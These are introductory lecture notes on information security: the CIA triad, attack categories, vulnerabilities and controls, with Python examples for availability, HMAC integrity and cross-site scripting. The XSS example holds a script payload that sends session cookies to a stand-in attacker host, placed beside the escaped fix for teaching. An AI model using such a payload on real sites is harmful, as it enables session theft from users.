Chapter One

Information Systems Security

Uploaded by zebrehe

 Chapter 1: Introduction to Information Security

 Introduction
 “The quality or state of being secure: to be free from danger”
 To be protected from adversaries, from those who would do harm, intentionally or
otherwise
 Freedom from risk or danger; safety.
 Freedom from doubt, anxiety, or fear; confidence
 A successful organization should have multiple layers of security in place:
o Physical security
o Personal security
o Operations security
o Communications security
o Network security
o Information security

 Why do we need security?


 Protect vital information while still allowing access to those who need it
o Trade secrets, medical records, etc.
 Provide authentication and access control for resources
 Guarantee availability of resources
o Ex: “five nines” (99.999% availability, about five minutes of downtime per year)
 Who is vulnerable?
 Financial institutions and banks
 Internet service providers
 Medical companies
 Government and defense agencies
 Contractors to various government agencies
 Multinational corporations
 Anyone on the network

 Common security attacks and their countermeasures

 Finding a way into the network → Firewalls
 Exploiting software bugs, buffer overflows → Intrusion Detection Systems (detection only;
the fix is patching the bug)
 Denial of Service → Ingress filtering, IDS
 TCP hijacking → IPsec
 Packet sniffing → Encryption (SSH, TLS (formerly SSL), HTTPS)
 Social problems → Education
 Why Security?
 The Internet was initially designed for connectivity
 Trust assumed
 We do more with the Internet nowadays
 Security protocols are added on top of the TCP/IP

 Fundamental aspects of information must be protected


 Confidential data
 Employee information
 Business models
 Protect identity and resources
 We can’t keep ourselves isolated from the Internet
 Most business communications are done online
 We provide online services
 We get services from third-party organizations online
 While many causes exist for security problems, at least three types of fundamental
weaknesses open the door to security problems.
o Technology weakness
o Policy weakness
o Configuration weakness

 Insecurity will increase in line with


 Not patching our systems
 Using weak passwords such as “password” or “1234”
 Downloading programs from the Internet
 Opening e-mail attachments from unknown senders
 Using wireless networks without encryption

 Problem: networks exist to share resources


 Computer networks are typically a shared resource used by many applications
representing different interests.
 The Internet is particularly widely shared, being used by competing businesses,
individuals/business with conflicting interests, and opportunistic criminals.
 Unless security measures are taken, a network conversation or a distributed application
may be compromised by an adversary
 Computer Security
 It is information security as applied to computers and networks.
 The objectives: protection of information from
o Theft
o Corruption
o Damage from disaster
 Definition
 Security: the prevention and protection of computer assets from unauthorized access,
use, alteration, degradation, destruction, and other threats.

 “The term computer system security means the collective processes and mechanisms by
which sensitive and valuable information and services are protected from publication,
tampering [alteration] or collapse by unauthorized activities or untrustworthy individuals and
unplanned events respectively.”

 Defining- Information Security


 Computer or Information Technology can be used for productive or destructive
purposes
 Computer Security → refers to techniques for ensuring that data stored in a computer
cannot be read or compromised by any individuals without authorization.
 Computer Security → The provisions and policies adopted to protect information and
property from theft, corruption, or natural disaster while allowing the information and
property to remain accessible and productive to its intended users.
 Privacy
 Privacy: the legal right of individuals, groups, or organizations to be protected against
unauthorized intrusion into their personal life or affairs, whether by direct physical means or
by publication of information.
 Security or privacy threat: any individual, group, act, or object that poses a danger to
computer security or privacy.

 No tension??
 No computer
 No network
 No Internet
• The most secure arrangement: either no computers at all, or computers not connected to
any network or the Internet and protected from any intrusion. It is also the least useful;
the rest of the chapter is about securing systems that must stay connected.
 What Is Information Security?
 Deals with several different "trust" aspects of information and its protection.
 “Protection of information systems against unauthorized access to or modification of
information, whether in storage, processing or transit, and against the denial of service to
authorized users or the provision of service to unauthorized users, including those
measures necessary to detect, document, and counter such threats.”
 Information security is defined as “protecting information and information systems from
unauthorized access, use, disclosure, disruption, modification, or destruction,” according
to U.S. law.
 In essence, it means we want to protect our data and our systems from those who would
seek to misuse it.
 What is Information Security?
 The protection of information and its critical elements, including the systems and
hardware that use, store, and transmit that information
 Necessary tools: policy, awareness, training, education, technology
 IS security is the collection of activities that protect the information system and the
data stored in it.
 Information security: a “well-informed sense of assurance that the information risks and
controls are in balance.”
 IS security is often described as a classic battle of “good vs. evil.”
 Computer security: The protection afforded to an automated information system in
order to attain the applicable objectives of preserving the integrity, availability and
confidentiality of information system resources (includes hardware, software, firmware,
information/data, and telecommunications).
 IT Security Management: a process used to achieve and maintain appropriate levels of
confidentiality, integrity, availability, accountability, authenticity and reliability.
 IT Security Management functions include:
o Organizational IT security objectives, strategies and policies
o Determining organizational IT security requirements
o Identifying and analyzing security threats to IT assets
o Identifying and analyzing risks
o Specifying appropriate safeguards
o Monitoring the implementation and operation of safeguards
o Developing and implementing a security awareness program
o Detecting and reacting to incidents
 In a general sense, security means protecting our assets.
 This may mean protecting them from attackers invading our networks, natural
disasters, adverse environmental conditions, power failures, theft or vandalism, or
other undesirable states.
 Ultimately, we will attempt to secure ourselves against the most likely forms of
attack, to the best extent we reasonably can, given our environment.
 Securing Components in IS
 Computer (software and hardware) is the key component in an information system
 Computer can be subject of an attack and/or the object of an attack
o When the subject of an attack, computer is used as an active tool to conduct attack
o When the object of an attack, computer is the entity being attacked
o Attacks can also be of two types:
• Direct (the attack is directed at the computer itself)
• Indirect (the computer is compromised in order to attack another system, e.g. as a
source of DoS traffic)
 Physical security – To protect the physical items, objects, or areas of an organization
from unauthorized access and misuse.
 Personal security – To protect the individual or group of individuals who are authorized
to access the organization and its operations.
 Operations security – To protect the details of a particular operation or series of activities.
 Communications security – To protect an organization’s communications media,
technology, and content.
 Network security – To protect networking components, connections, and contents.

 Computer as Subject and Object of an attack


 Common Computer Security Measures
 Most computer security measures involve data encryption and passwords.
 Data encryption is the translation of data into a form that cannot be read without a
deciphering mechanism.
 A password is a secret word or phrase that gives a user access to a particular program or
system.
 Goals of Computer Security / Information Security
 To maintain information Confidentiality
 To ensure the Integrity and Reliability of data resources
 To ensure the Uninterrupted Availability of data resources and online operations
 To ensure non-repudiation of information sent (the sender cannot later deny having sent
it), in line with security and privacy laws and guidelines

 Computer Security Goals


 Information Security: Basic Requirements, also known as the security triad (CIA)

 Necessary tools for information security: policy, awareness, training, education,
technology
 C.I.A. Triangle
 Industry standard for computer security since the development of the mainframe.
 It was solely based on three characteristics that described the utility of information:
confidentiality, integrity, and availability.
 When you design and use security controls, you are addressing one or more of these
components.
 Three widely accepted elements or areas of focus (referred to as the “CIA Triad”):

o Confidentiality
o Integrity
o Availability (Recoverability)
 Includes Physical Security as well as Electronic

 Information Security: Basic Requirements


 Confidentiality - refers to protecting information from unauthorized read operations
o the term privacy is often used when the data to be protected refer to individuals
o The quality or state of preventing disclosure or exposure to unauthorized
individuals or systems.
• Data confidentiality: assures that confidential information is not disclosed to
unauthorized individuals
 Of personal data and information
 Credit card account numbers and bank account numbers
 Social Security numbers and address information
 Of intellectual property of businesses
 Copyrights, patents, and secret formulas
 Source code, customer databases, and technical specifications
 Of national security
 Military intelligence
 Homeland security and government-related information
 Integrity - refers to protecting information from modification; it involves several
goals:
o Assuring the integrity of information with respect to the original information
(relevant especially in web environments) – often referred to as authenticity
o Protecting information from unauthorized modifications
o Protecting information from incorrect modifications – referred to as semantic
integrity.
✓ The quality or state of being whole, complete, and uncorrupted.
• Data integrity: assures that information and programs are changed only in a
specified and authorized manner
• System integrity: assures that a system performs its operations in an unimpaired
manner
• The integrity of information is threatened when the information is exposed to
corruption, damage, destruction, or other disruption of its authentic state.
• Data has integrity if the data is not altered, is valid, and is accurate
 Of user names and passwords; patents and copyrights; source
code; diplomatic information; financial data

 Availability - ensures that access to information is not denied to authorized (legitimate)
subjects
o Enables users who need to access information to do so without interference or
obstruction and in the required format.
o Assures that systems work promptly and service is not denied to authorized users
o The information is said to be available to an authorized user when and where
needed and in the correct format.
o In the context of information security, availability is generally expressed as
the amount of time users can use a system, application, and data.
 Uptime: The total amount of time that a system, application,
and data are accessible.
 Downtime: The total amount of time that a system, application,
and data are not accessible.
o Availability = (Total Uptime) / (Total Uptime + Total Downtime)
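The formula above, applied to a constructed incident log, as an added example (it is not part of the original notes). It also converts an availability target expressed in nines into the downtime budget that target allows, which is how a five-nines figure such as the one quoted earlier in the chapter is checked in practice. The window and the incident times are made up for the example; the merging of overlapping incidents is the one detail a naive sum gets wrong when two monitors report the same outage.

```python
# Added example (not from the original notes): availability computed from an
# incident log, and the downtime budget implied by an "N nines" target.
from datetime import datetime, timedelta

# Constructed sample data: a 30-day observation window and three outages.
WINDOW_START = datetime(2024, 1, 1)
WINDOW_END = datetime(2024, 1, 31)
INCIDENTS = [
    (datetime(2024, 1, 4, 2, 10), datetime(2024, 1, 4, 2, 13)),    # 3 min
    (datetime(2024, 1, 17, 9, 0), datetime(2024, 1, 17, 9, 45)),   # 45 min
    (datetime(2024, 1, 30, 23, 50), datetime(2024, 2, 1, 0, 0)),   # runs past the window; 10 min count
]


def total_downtime(incidents, start, end):
    """Sum outage time inside [start, end), merging overlapping incidents so that
    two monitors reporting the same outage are not counted twice."""
    clipped = sorted((max(s, start), min(e, end)) for s, e in incidents)
    down = timedelta(0)
    cur_start = cur_end = None
    for s, e in clipped:
        if e <= s:
            continue                      # incident lies entirely outside the window
        if cur_end is None or s > cur_end:
            if cur_end is not None:
                down += cur_end - cur_start
            cur_start, cur_end = s, e     # start a new merged interval
        else:
            cur_end = max(cur_end, e)     # extend the current merged interval
    if cur_end is not None:
        down += cur_end - cur_start
    return down


def availability(incidents, start, end):
    """Availability = uptime / (uptime + downtime), as a fraction of the window."""
    total = end - start
    uptime = total - total_downtime(incidents, start, end)
    return uptime / total                 # timedelta / timedelta -> float


def downtime_budget(nines, period=timedelta(days=365)):
    """Maximum downtime per period that still meets an availability of N nines."""
    return period * (10 ** -nines)


def meets_target(incidents, start, end, nines):
    """True if the measured availability reaches the N-nines target."""
    return availability(incidents, start, end) >= 1 - 10 ** -nines


if __name__ == "__main__":
    a = availability(INCIDENTS, WINDOW_START, WINDOW_END)
    print(f"availability over window: {a:.6f}")
    for n in (2, 3, 4, 5):
        budget = downtime_budget(n)
        met = meets_target(INCIDENTS, WINDOW_START, WINDOW_END, n)
        print(f"{n} nines: {budget.total_seconds() / 60:.2f} min/year allowed,"
              f" target {'met' if met else 'missed'}")
```

With 58 minutes of downtime in a 43,200-minute window the sample service reaches about 99.866%, so it meets a two-nines target and misses three nines; five nines allows only about 315 seconds (5.26 minutes) of downtime per year, which is why it is rarely promised for a single system without redundancy.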

 Although the use of the CIA triad to define security objectives is well established, some
in the security field feel that additional concepts are needed to present a complete picture.
Two of the most commonly mentioned are:
o Authenticity: The property of being genuine and being able to be verified and
trusted; confidence in the validity of a transmission, a message, or message
originator.
o Accountability: The security goal that generates the requirement for actions of an
entity to be traced uniquely to that entity.
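The data-integrity and authenticity goals described above (unauthorized modification must be detectable, and the origin of a message must be verifiable) can be demonstrated with a keyed hash. The following is an added example and not code from the original notes; the record, the key and the attacker's edits are constructed for illustration.

```python
# Added example (not from the original notes): detecting unauthorized modification
# of a record, and checking who produced it, with HMAC-SHA256 under a shared key.
import hashlib
import hmac
import json
import secrets


def canonical(record: dict) -> bytes:
    """Serialize deterministically so equal records always produce equal tags."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode("utf-8")


def tag(record: dict, key: bytes) -> str:
    """Integrity/authenticity tag: only a holder of `key` can compute it."""
    return hmac.new(key, canonical(record), hashlib.sha256).hexdigest()


def verify(record: dict, received_tag: str, key: bytes) -> bool:
    """Recompute the tag and compare in constant time (avoids a timing side channel)."""
    return hmac.compare_digest(tag(record, key), received_tag)


def demo() -> dict:
    key = secrets.token_bytes(32)                         # shared by sender and verifier
    record = {"from": "ACC-1001", "to": "ACC-2002", "amount": 100}   # constructed transfer
    t = tag(record, key)

    tampered = dict(record, amount=100_000)               # attacker edits the amount
    # Without the key an attacker can only produce a keyless hash, not a valid tag.
    forged = hashlib.sha256(canonical(tampered)).hexdigest()
    return {
        "original_ok": verify(record, t, key),            # True
        "tampered_ok": verify(tampered, t, key),          # False: content changed
        "forged_ok": verify(tampered, forged, key),       # False: tag made without key
        "wrong_key_ok": verify(record, t, secrets.token_bytes(32)),  # False: other party
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

A caveat worth keeping in mind: an HMAC proves that someone holding the shared key produced the tag, which covers integrity and authenticity between two parties, but not non-repudiation, since either party could have produced it. Where a third party must be convinced of who sent a message, a digital signature (private key to sign, public key to verify) is needed instead.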
 Critical Characteristics of Information
 The C.I.A. triangle has expanded into a list of critical characteristics of information
✓ The value of information comes from the characteristics it possesses:
o Accuracy – Free from mistake or error and having the value that the end user
expects. If information contains a value different from the user’s expectations due
to the intentional or unintentional modification of its content, it is no longer
accurate.
o Authenticity –The quality or state of being genuine or original, rather than a
reproduction or fabrication. Information is authentic when it is the information
that was originally created, placed, stored, or transferred.
o Utility – The quality or state of having value for some purpose or end.
Information has value when it serves a particular purpose. This means that if
information is available, but not in a format meaningful to the end user, it is not
useful.
o Possession – The quality or state of having ownership or control of some object or
item. Information is said to be in possession if one obtains it, independent of
format or other characteristic. While a breach of confidentiality always results in a
breach of possession, a breach of possession does not always result in a breach of
confidentiality (for example, stolen data that remains encrypted).
 Why Is Computer Network and Information Security Important?
 To protect company assets
 To gain a competitive advantage
 To comply with regulatory requirements and fiduciary responsibilities
✓ To keep your job.
 The growing fear of cyber terrorism
 Attacks to the infrastructure would affect a large portion of the Internet and create a large
amount of service disruption
 Challenges in Computer Network and Information security
 The requirements seem to be straightforward; indeed, most of the major requirements for
security services can be given self-explanatory, one-word labels: confidentiality,
authentication, nonrepudiation, or integrity. But the mechanisms used to meet those
requirements can be quite complex, and understanding them may involve rather subtle
reasoning.
 In developing a particular security mechanism or algorithm, one must always consider
potential attacks on those security features. In many cases, successful attacks are
designed by looking at the problem in a completely different way, therefore exploiting an
unexpected weakness in the mechanism.
 The procedures used to provide particular security services are often counter intuitive.
Typically, a security mechanism is complex, and it is not obvious from the statement of a
particular requirement that such elaborate measures are needed.
 Having designed security mechanisms, it is necessary to decide where to use them. This is
true both in terms of physical placement (at which points in the network) and in a logical
sense (at which layer of an architecture such as TCP/IP).
 Security mechanisms typically involve more than a particular algorithm or protocol. They
also require that participants be in possession of some secret information (e.g., an
encryption key), which raises questions about the creation, distribution, and protection of
that secret information.
 It is a battle of wits between a perpetrator who tries to find holes and the designer or
administrator who tries to close them. The great advantage that the attacker has is that he
or she need only find a single weakness, while the designer must find and eliminate all
weaknesses to achieve perfect security.
 There is a natural tendency on the part of users and system managers to perceive little
benefit from security investment until a security failure occurs.
 Security requires regular, even constant, monitoring, and this is difficult in today’s short-
term, overloaded environment.
 Security is still too often an afterthought to be incorporated into a system after the design
is complete rather than being an integral part of the design process.
 Many users and even security administrators view strong security as an impediment to
efficient and user-friendly operation of an information system or use of information. The
difficulties just enumerated will be encountered in numerous ways as we examine the
various security threats and mechanisms.
 Internet infrastructures are vulnerable.
 Solutions usually require a larger scale of modification
 Security and performance tradeoff
 Security is only as strong as the weakest link
 Attacks can be easily launched and difficult to be traced
 What are the basic security measures?
 External security: the protection of computer systems from environmental damage
such as floods and heat, physical security such as locking rooms and computers, and
electrical protection against power surges and electromagnetic interference.
 Operational security: deciding who has access to what, and limiting access by time and
location
 Surveillance: properly placed security cameras can deter theft and vandalism
 Passwords/authentication: the most common form of security. Some simple rules for
password security:
o Pick a long, strong, random password (or passphrase), different for every system
o Don’t share passwords, and don’t write them down where others can read them
o Don’t use names or familiar objects as passwords
o Change your password when you suspect it has been exposed; current guidance (NIST SP
800-63B) no longer recommends forced periodic rotation, which tends to produce weaker,
predictable passwords
 Authentication: the process of reliably verifying the identity of someone or something by
means of a secret (password), an object (smart card), a physical characteristic (fingerprint),
or trust.
 Auditing: used to detect wrong doing
 Access rights: determine who may access a resource and how. Who is given access? (no
one, a group of users, all users). What kind of access? (read, write, delete, print, copy,
execute).
 Viruses/worms and antivirus tools
 Firewalls
 Encryption and Decryption Techniques
 Digital Signature
 Security Policy
 Categories of attacks
 Interruption: An attack on availability
 Interception: An attack on confidentiality
 Modification: An attack on integrity
 Fabrication: An attack on authenticity
 Categories of Attacks/Threats

 Some Types of Attacks


 What are some common attacks?
o Network attacks
• Packet sniffing, man-in-the-middle
o Web attacks
• Phishing, cross-site scripting
o OS, application and software attacks
• Viruses, Trojans, worms, rootkits, buffer overflows
 Not all hackers are evil wrongdoers trying to steal your info
o Ethical hackers, consultants, penetration testers, researchers
 Network Attacks
 Packet Sniffing
o Internet traffic consists of data “packets”, and on a shared or compromised network
segment these can be “sniffed” by anyone with access to the medium
o Leads to other attacks such as password sniffing, cookie stealing, session hijacking and
information stealing
 Man in the Middle
o The attacker gets onto the path between client and server (for example by inserting a
rogue router or gateway) and reads or changes the packets as they pass through
 Web Attacks
 Phishing
o A malicious website pretends to be a trusted website
o Example:
• You type, by mistake, “mibank.com” instead of “mybank.com”
• mibank.com is designed to look like mybank.com, so the user types in their
credentials as usual
• Now an attacker has your credentials (more often the victim is led to the lookalike site
by a link in an e-mail rather than by a typo)
 Cross Site Scripting
o Injecting attacker-controlled script into a page served by a trusted site, so that it runs
in the victim’s browser with that site’s privileges and can steal session cookies or data
the user enters there
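The cross-site scripting case above, shown as the vulnerable rendering beside the hardened one. This is an added example and not code from the original notes; the search page, the attacker host `attacker.example` and the payload are constructed for illustration.

```python
# Added example (not from the original notes): a reflected cross-site scripting bug
# in a page that echoes a search query, beside the escaped version.
import html

# Constructed payload: if it runs inside the trusted site's page it sends the
# session cookie to a host the attacker controls (a made-up name).
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def render_search_vulnerable(query: str) -> str:
    """Untrusted input is pasted into markup, so a <script> in the query runs in the
    trusted site's origin, with access to that site's cookies and DOM."""
    return f"<h1>Results for: {query}</h1>"


def render_search_safe(query: str) -> str:
    """html.escape converts < > & ' and " into entities; the browser shows the text
    instead of executing it. The encoding must match the context: this one is for
    element text, not for attributes, URLs or inline script."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
```

In practice the escaping is left to a template engine with auto-escaping turned on, so that no code path can forget it, and a Content-Security-Policy header limits what a script can do if one slips through anyway.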
 Computer Security Components
 Vulnerability is a point where a system is susceptible to attack.
 A threat is a possible danger to the system. The danger might be a person (a system
cracker or a spy), a thing (a faulty piece of equipment), or an event (a fire or a flood) that
might exploit a vulnerability of the system.
 Countermeasures are techniques for protecting your system
 Vulnerability in Computing
 In computer security, vulnerability is a weakness which allows an attacker to reduce a
system's information assurance.
 Vulnerability is the intersection of three elements:
o A system susceptibility or flaw itself(fault),
o Attacker access to the flaw(fault), and
o Attacker capability to exploit the flaw (fault).
 To exploit a vulnerability, an attacker must have at least one applicable tool or technique
that can reach the system weakness. The set of points through which an attacker can reach
a system is its attack surface.
 Defining vulnerability
 “A weakness of an asset or group of assets that can be exploited by one or more
threats.” (ISO 27005 definition)
 Where an asset is anything that has value to the organization, its business operations
and their continuity, including information resources that support the organization's
mission
 Types of Vulnerabilities
 Physical vulnerabilities (Ex. Buildings)
 Natural vulnerabilities (Ex. Earthquake)
 Hardware and Software vulnerabilities (Ex. Failures)
 Media vulnerabilities (Ex. Disks can be stolen)
 Communication vulnerabilities (Ex. Wires can be tapped)
 Human vulnerabilities (Ex. Insiders)

 Classification of Vulnerabilities

 Hardware
o susceptibility to humidity
o susceptibility to dust
o susceptibility to soiling
o susceptibility to unprotected storage
 Software
o insufficient testing
o lack of audit trail
 Network
o unprotected communication lines
o insecure network architecture
 Personnel
o inadequate recruiting process
o inadequate security awareness
 Site
o area subject to flood
o unreliable power source
 Organizational
o lack of regular audits
o lack of continuity plans
o lack of security
 Causes of Vulnerabilities
 Complexity: Large, complex systems increase the probability of flaws and unintended
access points
 Familiarity: Using common, well-known code, software, operating systems, and/or
hardware increases the probability an attacker has or can find the knowledge and tools to
exploit the flaw
 Connectivity: more physical connections, privileges, ports, protocols and services, and
more time during which each of those is accessible, all increase exposure
 Password management flaws: users choose weak passwords that can be discovered by
brute force, store passwords on the computer where a program can read them, or re-use
passwords across many programs and websites.
 Internet website browsing: some websites carry spyware or adware that is installed
automatically on visiting systems; once infected, the system collects personal information
and passes it on to third parties.
 Software bugs: the programmer leaves an exploitable bug in a program, which may allow an
attacker to misuse the application.
 Not learning from past mistakes: for example, most vulnerabilities discovered in IPv4
protocol software were rediscovered in the new IPv6 implementations
 Research has shown that the most vulnerable point in most information systems is the
human user, operator, designer, or other human, so humans should be considered in their
different roles as asset, threat, and information resource. Social engineering is an
increasing security concern.
 A threat is a potential or actual adverse event that may be malicious or incidental, and
that can compromise the assets of an enterprise or the integrity of a computer or network.
 Countermeasures can take the form of software, hardware and modes of behavior.
Software countermeasures include:
 personal firewalls
 anti-virus software
 pop-up blockers
 Spyware detection/removal programs
 Computer security controls
 Authentication (Password, Cards, Biometrics) (What we know, have, are!)
 Encryption
 Auditing
 Administrative procedures
 Standards
 Physical Security
 Laws
